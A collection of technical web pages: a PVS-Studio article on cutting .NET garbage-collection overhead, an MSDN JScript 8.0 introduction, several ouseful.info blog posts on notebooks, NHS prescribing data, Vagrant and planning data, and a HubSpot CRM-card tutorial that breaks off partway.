  IL_0005: stloc.0
  IL_0006: ldloc.0
  IL_0007: ldarg.0
  IL_0008: stfld class [Microsoft.CodeAnalysis]
                   Microsoft.CodeAnalysis.SyntaxNode
                 OptimizationsAnalyzer.SyntaxNodeUtils
                 /'<>c__DisplayClass0_0'::node
  IL_000d: ldarg.1
  IL_000e: ldloc.0
  IL_000f: ldftn instance bool OptimizationsAnalyzer.SyntaxNodeUtils
             /'<>c__DisplayClass0_0'::'<IsKindEqual>b__0'(
               valuetype [Microsoft.CodeAnalysis.CSharp]
                 Microsoft.CodeAnalysis.CSharp.SyntaxKind)
  IL_0015: newobj instance void class [mscorlib]System.Func`2<
             valuetype [Microsoft.CodeAnalysis.CSharp]
               Microsoft.CodeAnalysis.CSharp.SyntaxKind,bool>::.ctor(
                 object, native int)
  IL_001a: call bool [System.Core]System.Linq.Enumerable::Any<
             valuetype [Microsoft.CodeAnalysis.CSharp]
               Microsoft.CodeAnalysis.CSharp.SyntaxKind>(
                 class [mscorlib]System.Collections.Generic.IEnumerable`1<!!0>,
                 class [mscorlib]System.Func`2<!!0,bool>)
  IL_001f: ret
}
```

There's a
little more code here than in C#. Note the instructions that create objects at the IL_0000 and IL_0015 labels. In the first case, the compiler creates an object of the type that it generated automatically (under the lambda's "hood"). The second *newobj* call creates the delegate instance that performs the *IsKind* check.

Bear in mind that in some cases the compiler may apply optimizations and not add a *newobj* instruction to create the generated type instance. Instead, the compiler can, for example, create an object once, write it to a static field and continue working with that field. The compiler behaves this way when there are no captured variables in lambda expressions.

A rewritten IsKindEqual variant
-------------------------------

Several temporary objects are created for every *IsKindEqual* call. As experience (and profiling) shows, sometimes this can play a significant role in terms of the pressure on GC.

One option is to avoid the method altogether. The caller can simply call the *IsKind* method several times. Another option is to rewrite the code.

The "before" version looks like this:

```
public static bool IsKindEqual(this SyntaxNode node,
                               params SyntaxKind[] kinds)
{
  return kinds.Any(kind => node.IsKind(kind));
}
```

One of the possible "after" versions looks like this:

```
public static bool IsKindEqual(this SyntaxNode node,
                               params SyntaxKind[] kinds)
{
  for (int i = 0; i < kinds.Length; ++i)
  {
    if (node.IsKind(kinds[i]))
      return true;
  }

  return false;
}
```

**Note**: You can also rewrite the code with *foreach*. When the compiler knows that we are working with an array, it generates the IL code of a *for* loop under the hood.

As a result, we got a little more code, but we got rid of the temporary object creation. We can see this by looking at the IL code — all of the *newobj* instructions have disappeared.
```
.method public hidebysig static bool IsKindEqual(
  class Optimizations.SyntaxNode node,
  valuetype Optimizations.SyntaxKind[] kinds) cil managed
{
  .custom instance void
    [mscorlib]System.Runtime.CompilerServices.ExtensionAttribute::.ctor()
    = ( 01 00 00 00 )
  .param [2]
  .custom instance void
    [mscorlib]System.ParamArrayAttribute::.ctor()
    = ( 01 00 00 00 )
  // Code size       29 (0x1d)
  .maxstack  3
  .locals init ([0] int32 i)
  IL_0000: ldc.i4.0
  IL_0001: stloc.0
  IL_0002: br.s IL_0015
  IL_0004: ldarg.0
  IL_0005: ldarg.1
  IL_0006: ldloc.0
  IL_0007: ldelem.i4
  IL_0008: callvirt instance bool
             Optimizations.SyntaxNode::IsKind(
               valuetype Optimizations.SyntaxKind)
  IL_000d: brfalse.s IL_0011
  IL_000f: ldc.i4.1
  IL_0010: ret
  IL_0011: ldloc.0
  IL_0012: ldc.i4.1
  IL_0013: add
  IL_0014: stloc.0
  IL_0015: ldloc.0
  IL_0016: ldarg.1
  IL_0017: ldlen
  IL_0018: conv.i4
  IL_0019: blt.s IL_0004
  IL_001b: ldc.i4.0
  IL_001c: ret
}
```

Overriding base methods in value types
--------------------------------------

Sample code:

```
enum Origin
{ }

void Foo()
{
  Origin origin = default;
  while (true)
  {
    var hashCode = origin.GetHashCode();
  }
}
```

Does this code put pressure on GC? Okay, okay: given that the code appears in this article, the answer seems obvious. Did you believe it? It's not that simple. To answer this question, we need to know whether the application runs on .NET Framework or .NET.

By the way, where does the pressure on GC come from here at all? No objects seem to be created on the managed heap. To understand what's going on, we had to look into the IL code and read the specifications. I covered this issue in more detail in [a separate article](https://pvs-studio.com/en/blog/posts/csharp/0844/). In short, here are some spoilers:

* object boxing may take place for the *GetHashCode* method call;
* if you want to avoid the boxing, override the base methods in your value types.
Setting collections' initial capacity
-------------------------------------

Some people might say: "Why do we need to set the initial capacity of the collection? Everything is already optimized under the hood." Of course, something is optimized (and we'll see what exactly). But let's talk about the places in an application where almost every object creation can play a trick on us. Don't neglect the opportunity to tell the collection the size you need.

Let's talk about why it is useful to set the initial capacity. We'll use the *List<T>* type as an example. Let's say we have the following code:

```
static List<Variable> CloneExample(IReadOnlyCollection<Variable> variables)
{
  var list = new List<Variable>();
  foreach (var variable in variables)
  {
    list.Add(variable.Clone());
  }

  return list;
}
```

Is it obvious what the problem with this code is? If yes — congratulations. If not, let's figure it out. We create an empty list and gradually fill it. Accordingly, every time the list runs out of capacity, we need to:

* allocate memory for a new array, into which the list elements are added;
* copy the elements from the previous array to the new one.

Where does the array come from? The array is the base of the *List<T>* type. Check [referencesource.microsoft.com](https://bit.ly/3Bfs1KK).

Obviously, the larger the *variables* collection, the greater the number of such operations performed.

The list growth algorithm in our case (for .NET Framework 4.8) is 0, 4, 8, 16, 32… That is, if the *variables* collection has 257 elements, it requires 8 arrays to be created, and 7 copy operations.

You can avoid all of these unnecessary procedures if you set the list capacity at the beginning:

```
var list = new List<Variable>(variables.Count);
```

Don't neglect that opportunity.
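The growth arithmetic above can be checked with a short simulation. This is a sketch in Python of the doubling policy described (0, 4, 8, 16, …), not the actual List implementation:

```python
def simulate_list_growth(n, initial_capacity=0):
    # Count regrowth allocations and element copies for a List<T>-style
    # doubling policy (0, 4, 8, 16, ... as in .NET Framework 4.8).
    capacity = initial_capacity
    count = 0
    allocations = 0      # arrays created by regrowth
    copies = 0           # copy operations performed
    elements_copied = 0  # total elements moved between arrays
    for _ in range(n):
        if count == capacity:
            capacity = 4 if capacity == 0 else capacity * 2
            allocations += 1
            if count > 0:
                copies += 1
                elements_copied += count
        count += 1
    return allocations, copies, elements_copied

print(simulate_list_growth(257))       # (8, 7, 508): 8 arrays, 7 copies
print(simulate_list_growth(257, 257))  # (0, 0, 0): pre-sized, no regrowth
```

Pre-sizing with the known element count avoids every regrowth allocation and copy, which is exactly what passing *variables.Count* to the constructor buys.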
LINQ: miscellaneous
-------------------

### Enumerable.Count

Depending on the overload, the *Enumerable.Count* method can:

* calculate the number of elements in a collection;
* calculate the number of elements in a collection that satisfy a predicate.

Moreover, the method offers several optimizations… but there's a catch.

Let's look inside the method. As usual, we take the source code from [referencesource.microsoft.com](https://bit.ly/3xA5LJx)

The version that does not accept a predicate looks like this:

```
public static int Count<TSource>(this IEnumerable<TSource> source)
{
  if (source == null) throw Error.ArgumentNull("source");

  ICollection<TSource> collectionoft = source as ICollection<TSource>;
  if (collectionoft != null)
    return collectionoft.Count;

  ICollection collection = source as ICollection;
  if (collection != null)
    return collection.Count;

  int count = 0;
  using (IEnumerator<TSource> e = source.GetEnumerator())
  {
    checked
    {
      while (e.MoveNext()) count++;
    }
  }

  return count;
}
```

And here's the version with the predicate:

```
public static int Count<TSource>(this IEnumerable<TSource> source,
                                 Func<TSource, bool> predicate)
{
  if (source == null) throw Error.ArgumentNull("source");
  if (predicate == null) throw Error.ArgumentNull("predicate");

  int count = 0;
  foreach (TSource element in source)
  {
    checked
    {
      if (predicate(element)) count++;
    }
  }

  return count;
}
```

Good news: the no-predicate version has an optimization that allows it to efficiently calculate the number of elements for collections that implement *ICollection<T>* or *ICollection*. However, if a collection does not implement either of these interfaces, the entire collection will be traversed to get the number of elements.

The predicate overload is where it gets especially interesting. Suppose we have the following code:

```
collection.Count(predicate) > 12;
```

And *collection* has 100 000 elements. Get it? To check this condition, it would have been enough for us to find 13 elements for which *predicate(element)* returns *true*.
Instead, *predicate* is applied to all of the 100 000 elements in the collection. This becomes a real problem if *predicate* performs relatively heavy operations.

There is a way out – go ahead and reinvent the wheel. Write your own *Count* analog(s). It's up to you to decide which method signature to use (and whether to write such methods at all). You can write several different methods. Or you can write a method with a tricky signature that helps determine which comparison you need ('>', '<', '==' etc.). If you have identified *Count*-related bottlenecks, but there are only a couple of them – just rewrite those places with a *foreach* loop.

### Any -> Count / Length

We have already determined that calling the *Any* method may require creating an extra iterator. We can avoid the creation of an extra object by using specific collections' properties: *List.Count* or *Array.Length*, for example.

For example:

```
static void AnyTest(List<String> values)
{
  while (true)
  {
    // GC
    if (values.Any())
    // Do smth

    // No GC
    if (values.Count != 0)
    // Do smth
  }
}
```

Such code is less flexible and maybe a little less readable. But at the same time, it *might* help avoid creating an extra iterator. Yes, *might*: it depends on whether the *GetEnumerator* method returns a new object. When I examined the issue more closely, I found some interesting details. Maybe I'll write an article on them later.

### LINQ -> loops

As experience shows, in places where every temporary object can hurt performance, it makes sense to abandon LINQ in favor of simple loops. We've already seen this in the examples with *Any* and *Count*. The same applies to other methods.
Example:

```
var strings = collection.OfType<String>()
                        .Where(str => str.Length > 62);

foreach (var item in strings)
{
  Console.WriteLine(item);
}
```

You can rewrite the code above like this:

```
foreach (var item in collection)
{
  if (item is String str && str.Length > 62)
  {
    Console.WriteLine(str);
  }
}
```

This is a primitive example where the difference is not very significant. Although there are also cases where LINQ queries are much easier to read than similar code in loops. So, bear in mind that it's a dubious idea to just abandon LINQ everywhere.

**Note**: If you have forgotten why LINQ causes the creation of objects on the heap, go through [this video](https://youtu.be/lVbXyeNp3yI) or [this article](https://pvs-studio.com/en/blog/posts/csharp/0836/).

### Buffering LINQ queries

Don't forget that every time you traverse a sequence, LINQ queries with deferred execution are executed all over again. The following example clearly demonstrates this:

```
static void LINQTest()
{
  var arr = new int[] { 1, 2, 3, 4, 5 };

  var query = arr.Where(AlwaysTrue);

  foreach (var item in query) // 5
  { /* Do nothing */ }

  foreach (var item in query) // 5
  { /* Do nothing */ }

  foreach (var item in query) // 5
  { /* Do nothing */ }

  bool AlwaysTrue(int val) => true;
}
```

In this case the *AlwaysTrue* method is executed 15 times. At the same time, if we had buffered the query (added a *ToList* call to the LINQ call chain), the *AlwaysTrue* method would have been called only 5 times.

Changing the garbage collection mode
------------------------------------

I have mentioned above that we have already done a number of optimizations in the PVS-Studio C# analyzer. We even wrote an article about that. After we published it on habr.com, the article prompted a heated discussion [in the comments](https://habr.com/en/company/pvs-studio/blog/562894/comments/). One of the suggestions was to change the garbage collector settings. Can't say we didn't know about them.
Moreover, when I was doing optimizations and reading a book "Pro .NET Performance: Optimize Your C# Applications", I also read about the GC settings. But somehow I didn't catch on to the fact that changing the garbage collection mode can bring any benefits. My bad. During my vacation, my colleagues did a very cool thing: they took the advice from the comments and decided to try altering the GC working mode. The result was impressive — the time that PVS-Studio C# required to analyze big projects (like Roslyn) was significantly reduced. At the same time, PVS-Studio used up more memory when analyzing small projects, but that was acceptable. After we altered the GC working mode, the analysis time decreased by 47%. Before, the analysis on this machine took 1 hour and 17 minutes. After — only 41 minutes. ![0852_NETAppsPerf_MinChangesMajorRes/image4.png](https://habrastorage.org/r/w1560/getpro/habr/post_images/d6c/32b/3f1/d6c32b3f18af2803d929eb27b3f168d4.png) I was excited to see Roslyn analysis take under 1 hour. We were so pleased with the results that we included the new (server) garbage collection mode in the C# analyzer. This mode will be enabled by default starting from the PVS-Studio 7.14. Sergey Tepliakov described the different garbage collection modes in more detail in [this article](https://devblogs.microsoft.com/premier-developer/understanding-different-gc-modes-with-concurrency-visualizer/). PVS-Studio C# analyzer optimization results ------------------------------------------- We have made a number of other optimizations. For example: * we got rid of the bottlenecks in some diagnostics (and [rewrote](https://pvs-studio.com/en/blog/posts/csharp/0823/) one); * we optimized the objects used in data-flow analysis: simplified copying, included additional caching, eliminated temporary objects on the managed heap; * optimized the comparison of tree nodes; * etc. We began to add all these optimizations slowly, starting from the PVS-Studio version 7.12. 
By the way, during this time, we also [added](https://pvs-studio.com/en/docs/manual/0010/) new diagnostics, .NET 5 support, and taint analysis.

Out of curiosity, I measured the analysis time of the open-source projects from our tests using PVS-Studio 7.11 and 7.14. I compared the analysis times of the projects that PVS-Studio took the longest to process.

On the graph below, you can see the analysis time (in minutes) of:

* the Juliet Test Suite project;
* the Roslyn project;
* the total time of analysis of all projects from the tests.

The graph itself:

![0852_NETAppsPerf_MinChangesMajorRes/image5.png](https://habrastorage.org/r/w1560/getpro/habr/post_images/4fd/c4d/e38/4fdc4de3802f397335170781b24e0a7e.png)

The increase in performance is clearly very significant. So, if you're not content with the operating speed of PVS-Studio for C#, come [try](https://pvs-studio.com/en-dotnet) it again. By the way, you can get an extended trial version for 30 days – just follow the link :)

If you encounter any problems — [contact our support](https://pvs-studio.com/en/about-feedback/), we will sort it out.

Conclusion
----------

Premature optimization is evil. Long live optimization based on profiling results! And remember that every small change in the right place of a reusable block of code can drastically affect performance.

As always, subscribe to [my Twitter](https://twitter.com/_SergVasiliev_) so as not to miss anything interesting.
https://habr.com/ru/post/572306/
Introduction to JScript 8.0 for JScript Programmers

The information presented here is mainly for programmers who are already familiar with JScript and want to learn about the new features introduced in JScript 8.0.

Common Tasks

- How to compile programs

  The JScript 8.0 command-line compiler creates executables and assemblies from JScript programs. For more information, see How to: Compile JScript Code from the Command Line.

- How to write a "Hello World" program

  It is easy to write the JScript 8.0 version of "Hello World". For more information, see The JScript Version of Hello World!.

- How to use data types

  In JScript 8.0, a colon specifies the type in a variable declaration or function definition. The default type is Object, which can hold any of the other types. For more information, see JScript Variables and Constants and JScript Functions.

  JScript 8.0 has several built-in data types (such as int, long, double, String, Object, and Number). For more information, see JScript Data Types. You can also use any .NET Framework data type after importing the appropriate namespace. For more information, see .NET Framework Class Library Reference.

- How to access a namespace

  A namespace is accessed using either the import statement (when using the command-line compiler) or the @import directive (when using ASP.NET). For more information, see import Statement.

  The /autoref option (which is on by default) automatically attempts to reference the assemblies that correspond to namespaces used in a JScript .NET program. For more information, see /autoref.

- How to create typed (native) arrays

  A typed array data type is declared by placing square brackets ([]) after the data type name. You can still use JScript array objects, objects created with the Array constructor. For more information, see Arrays Overview.

- How to create a class

  In JScript 8.0, you can define your own classes. Classes can include methods, fields, properties, static initializers, and sub-classes.
You can write a completely new class, or you can inherit from an existing class or interface. Modifiers control the visibility of the class members, how members are inherited, and the overall behavior of a class. Custom attributes can also be used. For more information, see Class-based Objects and JScript Modifiers.
http://msdn.microsoft.com/en-US/library/5kas1c51(v=vs.80).aspx
Category: Tinkering

Authoring Multiple Docs from a Single IPython Notebook

It's my not-OU today, and whilst I should really be sacrificing it to work on some content for a FutureLearn course, I thought instead I'd tinker with a workflow tool related to the production process we're using.

The course will be presented as a set of HTML docs on FutureLearn, supported by a set of IPython notebooks that learners will download and execute themselves.

The handover resources will be something like:

- a set of IPython notebooks;
- a Word document for each week containing the content to appear online. This document will be used as the basis for multiple pages on the course website; the content is entered into the FutureLearn system by someone else as markdown (though I'm not sure what flavour?);
- for each video asset, a Word document containing the script;
- ?separate image files (the images will also be in the Word doc).

Separate webpages provide teaching that leads into a linked IPython notebook. (Learners will be running IPython via Anaconda on their own desktops – which means tablet/netbook users won't be able to do the interactive activities as currently delivered; we looked at using Wakari, but didn't go with it; offering our own hosted solution or tmpnb server was considered out of scope.)

The way I have authored my week is to create a single IPython document that proceeds in a linear fashion, with "FutureLearn webpage" content authored as markdown, as well as incorporating executed code cells, followed by "IPython notebook" activity content relating to the previous "webpage". The "IPython notebook" sections are preceded by a markdown cell containing a NOTEBOOK START statement, and closed with a markdown cell containing a NOTEBOOK END statement.
I then run a simple script that:

- generates one IPython notebook per "IPython notebook" section;
- creates a monolithic notebook containing all, but just, the "FutureLearn webpage" content;
- generates a markdown version of that monolithic notebook;
- uses pandoc to convert the monolithic markdown doc to a Microsoft Word/docx file.

Note that it would be easy enough to render each "FutureLearn webpage" doc as markdown directly from the original notebook source, into its own file that could presumably be added directly to FutureLearn, but that was seen as being overly complex compared to the original "copy rendered markdown from notebook into Word and then somehow generate markdown to put into FutureLearn editor" route.

```
import io, sys
import IPython.nbformat as nb
import IPython.nbformat.v4.nbbase as nb4

#Are we in a notebook segment?
innb=False

#Quick and dirty count of notebooks
c=1

#The monolithic notebook is the content ex of the separate notebook content
monolith=nb4.new_notebook()

#Load the original doc in
mynb=nb.read('ORIGINAL.ipynb',nb.NO_CONVERT)

#For each cell in the original doc:
for i in mynb['cells']:
    if (i['cell_type']=='markdown'):
        #See if we can spot a standalone notebook code delimiter
        if ('START NOTEBOOK' in i['source']):
            #At the start of a block, create a new notebook
            innb=True
            test=nb4.new_notebook()
        elif ('END NOTEBOOK' in i['source']):
            #At the end of the block, save the code to a new
            #standalone notebook file
            innb=False
            nb.write(test,'test{}.ipynb'.format(c))
            c=c+1
        elif (innb):
            test.cells.append(nb4.new_markdown_cell(i['source']))
        else:
            monolith.cells.append(nb4.new_markdown_cell(i['source']))
    elif (i['cell_type']=='code'):
        #For the code cells, preserve any output text
        cc=nb4.new_code_cell(i['source'])
        for o in i['outputs']:
            cc['outputs'].append(o)
        #Route the code cell as required...
        if (innb):
            test.cells.append(cc)
        else:
            monolith.cells.append(cc)

#Save the monolithic notebook
nb.write(monolith,'monolith.ipynb')

#Convert it to markdown
!ipython nbconvert --to markdown monolith.ipynb

##On a Mac, I got pandoc via:
#brew install pandoc

#Generate a Microsoft .docx file from the markdown
!pandoc -o monolith.docx -f markdown -t docx monolith.md
```

What this means is that I can author a multiple chapter, multiple notebook minicourse within a single IPython notebook, then segment it into a variety of different standalone files using a variety of document types.

Of course, what I really should have been doing was working on the course material… but then again, it was supposed to be my not-OU today…;-)

Data Driven Press Releases From HSCIC Data – Diabetes Prescribing

By chance, I saw a tweet from the HSCIC yesterday announcing 'Prescribing for Diabetes, England – 2005/06 to 2014/15' #hscicstats. The data comes via a couple of spreadsheets, broken down at the CCG level.

As an experiment, I thought I'd see how quickly I could come up with a story form and template for generating a "data driven press release" that localises the data, and presents it in a textual form, for a particular CCG.

It took a couple of hours, and at the moment my recipe is hard coded to the Isle of Wight, but it should be easily generalisable to other CCGs (the blocker at the moment is identifying regional codes from CCG codes (the spreadsheets in the release don't provide that linkage – another source for that data is required)).

Anyway, here's what I came up with:

Figures recently published by the HSCIC show that for the reporting period Financial 2014/2015, the total Net Ingredient Costs (NIC) for prescribed diabetes drugs was £2,450,628.59, representing 9.90% of overall Net Ingredient Costs. The ISLE OF WIGHT CCG prescribed 136,169 diabetes drugs items, representing 4.17% of all prescribed items. The average net ingredient cost (NIC) was £18.00 per item.
This compares to 4.02% of items (9.85% of total NIC) in the Wessex (Q70) region and 4.45% of items (9.98% of total NIC) in England.

Of the total diabetes drugs prescribed, Insulins accounted for 21,170 items at a total NIC of £1,013,676.82 (£47.88 per item (on average), 0.65% of overall prescriptions, 4.10% of total NIC) and Antidiabetic Drugs accounted for 93,660 items at a total NIC of £825,682.54 (£8.82 per item (on average), 2.87% of overall prescriptions, 3.34% of total NIC).

For the NHS ISLE OF WIGHT CCG, the NIC in 2014/15 per patient on the QOF diabetes register in 2013/14 was £321.53. The QOF prevalence of diabetes, aged 17+, for the NHS ISLE OF WIGHT CCG in 2013/14 was 6.43%. This compares to a prevalence rate of 6.20% in Wessex and 5.70% across England.

All the text generator requires me to do is pass in the name of the CCG and the area code, and it does the rest. You can find the notebook that contains the code here: diabetes prescribing textualiser.

Fragments – Running a Shell Script Once Only in vagrant

Via somewhere (I've lost track of the link), here's a handy recipe for running a shell script once and once only from a Vagrantfile.

In the shell script (runonce.sh):

```
#!/bin/bash

if [ ! -f ~/runonce ]
then
  #ONCE RUN CODE HERE
  touch ~/runonce
fi
```

In the Vagrantfile:

```
config.vm.provision :shell, :inline => <<-SH
  chmod ugo+x /vagrant/runonce.sh
  /vagrant/runonce.sh
SH
```

Exporting and Distributing Docker Images and Data Container Contents

Although! Dood…:-)

A Quick Look at Planning Data on the Isle of Wight

One of the staples that I suspect many folk look to in our weekly local paper, the Isle of Wight local press, is the listing of recent planning notices. The Isle of Wight Council website also provides a reasonably comprehensive online source of planning information. Notices are split across several listings:

- applications currently under consideration;
- recent decisions;
- current and recent appeals;
- archive search (back to February, 2004).
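For illustration, here's a minimal sketch of pulling application references and addresses out of such a listing page, using Python's standard-library HTML parser. The markup below is invented; the real council pages would need their own parsing rules:

```python
from html.parser import HTMLParser

# Hypothetical listing markup, standing in for a scraped council page.
SAMPLE = """
<table id="applications">
  <tr><td>P/00123/15</td><td>1 High St, Newport</td></tr>
  <tr><td>P/00456/15</td><td>2 Sea View, Ryde</td></tr>
</table>
"""

class AppListParser(HTMLParser):
    """Collect (reference, address) tuples from table rows."""
    def __init__(self):
        super().__init__()
        self.rows, self.row, self.in_td = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "td":
            self.in_td = True
    def handle_endtag(self, tag):
        if tag == "td":
            self.in_td = False
        elif tag == "tr" and self.row:
            self.rows.append(tuple(self.row))
            self.row = []
    def handle_data(self, data):
        # Only keep text that sits inside a cell
        if self.in_td and data.strip():
            self.row.append(data.strip())

parser = AppListParser()
parser.feed(SAMPLE)
print(parser.rows)
# [('P/00123/15', '1 High St, Newport'), ('P/00456/15', '2 Sea View, Ryde')]
```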
It’s easy enough to knock up a scraper to grab the list of current applications, scrape each of the linked to application pages in turn, and then generate a map showing the locations of the current planning applications. Indeed, working with my local hyperlocal onthewight.com, here’s a sketch of exactly such an approach, published for the first time yesterday: Isle of Wight planning applications : Mapped (announcement). I’m hoping to do a lot more with OnTheWight – and perhaps others…? – over the coming weeks and months, so it’d great to hear any feedback you have either here, or on the OnTheWight site itself. Where Next? The sketch is a good start, but it’s exactly that. If we are going to extend the service, for example, by also providing a means of reviewing recently accepted (or rejected) applications, as well as applications currently under appeal, we perhaps need to think a little bit more clearly about how we store the data – and keep track of where it is in the planning process. If we look at the page for a particular application, we see that there are essentially three tables: The listings pages also take slightly different forms. All of them have an address, and all of them have a planning application identification number (though in two forms, albeit intersecting); but they differ in terms of the semantics of the third and possible fourth columns, although each ultimately resolves to a date or null value. – current (and archive) listings: – recent decisions: – appeals: At the moment, the OnTheWight sketchmap is generated from a scrape of the Isle of Wight Council current planning applications page (latitude and longitude are generated by geocoding the address). A more complete solution would be to start to build a database of all applications, though this requires a little bit of thought when it comes to setting up the database so it becomes possible to track the current state of a particular application. 
It might also be useful to put together a simple flow chart that shows how the public information available around an application evolves as the application progresses, and then build a data model that can readily reflect that. We could then start to annotate that chart with different output opportunities – for example, as far as the map goes, it's easy enough to imagine several layers: a current applications layer, a (current) appeals layer, a recent decisions layer, an archived decisions layer.

A process diagram would also allow us to start spotting event opportunities around which we might be able to generate alerts. For example, generating feeds that allow you to identify changes in application activity within a particular unit postcode or postcode district (ONS: UK postcode structure) or ward could act as the basis of a simple alerting mechanism. It's then easy enough to set up an IFTTT feed-to-email pipe, though longer term an "onsite" feed-to-email subscription service would allow for a more local service. (Is there a WordPress plugin that lets logged-in users generate multiple email subscriptions to different feeds?)

In terms of other value-adds that arise from processing the data, I can think of a few… For example, keeping track of repeated applications to the same property, analysing which agents are popular in terms of applications (and perhaps generating a league table of success rates!), linkage to other location based services (for example, license applications or prices paid data) and so on.

Takes foot off spade and stops looking into the future, surveys weeds and half dug hole…;-)
http://blog.ouseful.info/category/tinkering/
Using HubSpot’s Custom CRM Cards Without an Integration Recently updated on The marketing software company HubSpot offers a nifty feature called "custom CRM cards." The idea is that a HubSpot dashboard can send a GET request to an API that you maintain, retrieve some JSON-formatted information and render it in some "cards" alongside other data (fig. 1). Figure 1 One of our clients wished to use this feature to pull in some data from their Django site without leaving HubSpot, and this turned out to be trickier than one might expect. Although HubSpot's own documentation is well written, it assumes that the reader is familiar with certain other aspects of HubSpot. For those new to HubSpot's features and products, as I was, it might not be enough to get you all the way to your goal. In this article we will explore, from beginning to end, how to create the cards and how to make them render in your dashboard. First and foremost, you will need access to a HubSpot account. Assuming you have this, read on. PART I - Creating the Card The custom CRM cards aren't created as free-standing entities that can be configured entirely within your HubSpot dashboard; rather, they have to exist inside a HubSpot "app" that you create. Creating an app requires a HubSpot developer account. This is different from an ordinary HubSpot account, but you need the ordinary account to create the developer account inside it. If you don't have one already, you can create one by going to. Once you've created the developer account, find your way to your developer account dashboard. You should see options to "Manage apps" and "Manage test accounts" (fig. 2). Figure 2 We're going to need both, but for now click "Manage apps," and then "Create app." And that's it! The app is now created. Rename it if you want, but at this point you are ready to configure your custom CRM cards. On the dashboard of the app you just created you should have a few choices in the left-hand nav. 
We're going to need "Basic Info" and "CRM cards," but let's start by clicking "CRM Cards." This part is pretty straightforward and is well documented at the link above. However, I'll summarize the procedure here: Click "Create CRM Card." This should bring up a UI with three tabs, "Data request," "Card properties" and "Custom actions." Select the "Data request" tab (fig. 3). Figure 3 In the field labeled "Data fetch URL" you'll enter the endpoint of the API you're going to make that will return the JSON used to populate the card. Note: We're not going to discuss how to build an API here; that can be done by any method you choose. All that matters is that the API be accessible over HTTPS at a fully qualified domain name, and that it return a JSON response with a couple of specific fields. First, it must contain a property called "results" that is associated to a list of JSON objects (key-value pairs). Second, each object in the list must -- at a minimum -- have properties called "objectId" and "title." If either property is missing, the card will not render. The structure of the JSON response is documented under the "Webhooks" tab at the HubSpot documentation URL above. Below "Data fetch URL" is "Target record types," where we have a grid of three columns (fig. 4). Figure 4 By flipping the switches in the column labeled "Appear on this type?" you determine the contexts in which your HubSpot dashboard will attempt to render the cards. Go ahead and flip the switch in the "Contacts" row. Now the cards will appear when you visit the "Contacts" area of your dashboard. The third column of the grid is "properties sent from hubspot." This represents the information that will eventually be sent in the querystring of the GET request to your API. For now, just add "hs_object_id" in there. Now your display should look like figure 4 above. That's everything we need to do on the "Data request" tab. 
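For reference, the smallest response body the fetch endpoint can return and still have the card render can be built with Python's json module so the shape is explicit (all values here are made-up placeholders):

```python
import json

# Minimal valid fetch response: a "results" list whose objects each
# carry the required "objectId" and "title" fields.
payload = {
    "results": [
        {"objectId": 1, "title": "Test object one"},
        {"objectId": 2, "title": "Test object two"},
    ]
}

body = json.dumps(payload, indent=2)
print(body)
```

Since the card silently fails to render if either required field is missing from any object in the list, it can be worth asserting their presence on the server before responding.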
In fact, that's all we need to do on this page, but I'd like to briefly discuss the "Card properties" tab and how it can affect what gets rendered in the card. When the CRM card fetches data from your API, it doesn't automatically render everything it receives in the response. For example, your response might look like this:

{
    "results": [
        {
            "objectId": 1,
            "title": "Test object one",
            "description": "The first test object"
        }
    ]
}

The formatting is correct, with a "results" property followed by a list of objects (well, one object). Furthermore, each object supplies the required "objectId" and "title" properties, as discussed above. This response is valid, and if you had everything else running, the "title" would be rendered in your card.

But presumably you'd like your card to tell you more than just a "title." For example, the object in this response also contains a "description" property. Here's the trick though: properties other than "title" will not render in your CRM card unless you also declare them in the "Card properties" tab. If you click on that tab and then click "add property," you can tell the card to look for a property named "description" with a data type of "string" and to display it with a label of your choosing. Now the "description" property in your JSON response will be rendered in the card. You can declare as many properties as you want in this way, and the order in which you declare them defines the order in which they will appear.

This arrangement sounds all right at first, but it has its drawbacks. First, you must manually declare each individual property, assigning it a label and data type, in order to render it in your card. This quickly becomes tiresome. Second, there is no easy way to reorder properties once you've declared them. If you declare 10 properties and then decide you'd like property 4 to appear third instead of fourth, you'll have to delete your properties 3 - 10 and start over from there.
Luckily, there's a workaround: Don't declare your additional properties on the same level with "objectId" and "title." Instead, put them into an inner object called, appropriately, "properties." Anything in the "properties" object, if correctly declared, will render in the card. Just make sure to supply a data type and label as well. For example, we could get our "description" property into the card like this:

{
    "results": [
        {
            "objectId": 1,
            "title": "Test object one",
            "properties": {
                "label": "Description",
                "dataType": "STRING",
                "value": "The first test object"
            }
        }
    ]
}

Some data types require additional information. For example, monetary values require a "currencyCode" key:

{
    "results": [
        {
            "objectId": 1,
            "title": "Test object one",
            "properties": {
                "label": "Price",
                "dataType": "CURRENCY",
                "value": "100.00",
                "currencyCode": "USD"
            }
        }
    ]
}

HubSpot provides documentation for all data types. This method of getting properties into your card requires more work on the backend and careful building of your JSON objects, but it allows you to add, change, or reorder properties however you like without needing to fuss with the "Card properties" tab.

PART II - Rendering the Card

I was stuck at this stage for a long time. Creating the card and app had gone fine, but what now? According to HubSpot's documentation, I needed to "install the app," which involved configuring OAuth and creating a "redirect URL." Wait, what? Why did I need OAuth when I'm using these cards in the HubSpot dashboard that I am already logged into? Why did I need a URL that would redirect me to... where? I'm already in my HubSpot dashboard, which is where I want to be.

This is the piece I was missing: Although HubSpot apps get *installed* in your HubSpot account, they *run* somewhere else. Now in my case, I only wanted to do one, singular thing: render some cards in my HubSpot dashboard. But that was unusual. Most of the time, HubSpot apps are more than just a support system for CRM cards.
Most HubSpot apps are integrations that run inside other pieces of software like Gmail, Wordpress, or Slack. They authenticate themselves with OAuth so that they can then make API calls to HubSpot. This was hard for me to see, because I only wanted to make API calls from HubSpot via the custom CRM cards. And the truth is that technically, for my purposes, I shouldn't have needed an app. I had no wish to pull HubSpot data into some other piece of software. But although my needs were simple, I still had to follow the rules of HubSpot's app integrations. That's the only way it works. I needed to create an app, even if it didn't do anything. Okay, we've created our app and configured its CRM cards. Now it's time to connect the app to our HubSpot console. However, according to their documentation, we learn that "Apps can’t be installed on developer accounts." I suppose a developer account is fundamentally different from a regular HubSpot account, so in order to test the app, HubSpot recommends that you create a test account. Let's do that. Go back to your developer account's home page, click on "Manage test accounts" and click "Create test account." Once the account is created, click the "Contacts" button in the top nav and then select "Contacts" (again) from the drop-down menu. Note that the test account comes with a couple of preprogrammed test contacts. Now go back again to your developer account's home page and click on "Manage apps" (see fig. 2, above). Click on the app you created above, and select "basic info" from the left-hand nav. This should bring up a UI with two tabs: "App info" and "Auth." Select the "Auth" tab. You should now be looking at the "Auth settings" (fig. 5). Figure 5 At the top is the "App credentials" section, which contains fields for "App ID," "Client ID" 